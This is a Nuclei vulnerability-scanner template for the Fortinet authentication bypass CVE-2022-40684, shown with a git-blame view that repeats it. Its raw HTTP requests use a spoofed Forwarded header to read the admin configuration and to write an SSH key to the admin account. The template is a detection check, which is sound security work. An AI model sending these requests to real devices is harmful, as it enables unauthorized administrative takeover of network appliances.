nuclei-templates/cves/2022/CVE-2022-40684.yaml

id: CVE-2022-40684

info:
  name: Fortinet - Authentication Bypass
  author: Shockwave,nagli,carlosvieira
  severity: critical
  description: |
    Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
    - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
    - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40684
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40684
    cwe-id: CWE-306
  tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev

requests:
  - raw:
      - |
        GET /api/v2/cmdb/system/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Node.js
        Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
        X-Forwarded-Vdom: root

      - |
        PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610

         {
          "ssh-public-key1":"{{randstr}}"
        }

    stop-at-first-match: true
    req-condition: true
    matchers-condition: or
    matchers:
      - type: word
        part: body_1
        words:
          - "ENC XXXX"
          - "http_method"
        condition: and

      - type: word
        part: body_2
        words:
          - 'Invalid SSH public key.'
          - 'cli_error'
        condition: and

# Enhanced by md on 2022/10/19
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`id: CVE-2022-40684`

			`info:`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`name: Fortinet - Authentication Bypass`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`author: Shockwave,nagli,carlosvieira`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`reference:`
			`- https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py`
			`- https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/`
			`- https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-40684`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`classification:`
Auto Generated CVE annotations [Fri Oct 21 08:16:09 UTC 2022] :robot: 2022-10-21 08:16:09 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Auto Generated CVE annotations [Tue Oct 25 14:05:39 UTC 2022] :robot: 2022-10-25 14:05:39 +00:00			`cvss-score: 9.8`
			`cve-id: CVE-2022-40684`
			`cwe-id: CWE-306`
Auto Generated CVE annotations [Fri Oct 14 09:24:23 UTC 2022] :robot: 2022-10-14 09:24:23 +00:00			`tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`GET /api/v2/cmdb/system/admin HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Node.js`
			`Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=`
			`X-Forwarded-Vdom: root`

			`- \|`
			`PUT /api/v2/cmdb/system/admin/admin HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Report Runner`
			`Content-Type: application/json`
			`Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;`
			`Content-Length: 610`

Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`{`
			`"ssh-public-key1":"{{randstr}}"`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`}`

			`stop-at-first-match: true`
			`req-condition: true`
			`matchers-condition: or`
			`matchers:`
			`- type: word`
			`part: body_1`
			`words:`
			`- "ENC XXXX"`
			`- "http_method"`
			`condition: and`

			`- type: word`
			`part: body_2`
			`words:`
			`- 'Invalid SSH public key.'`
			`- 'cli_error'`
			`condition: and`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00
			`# Enhanced by md on 2022/10/19`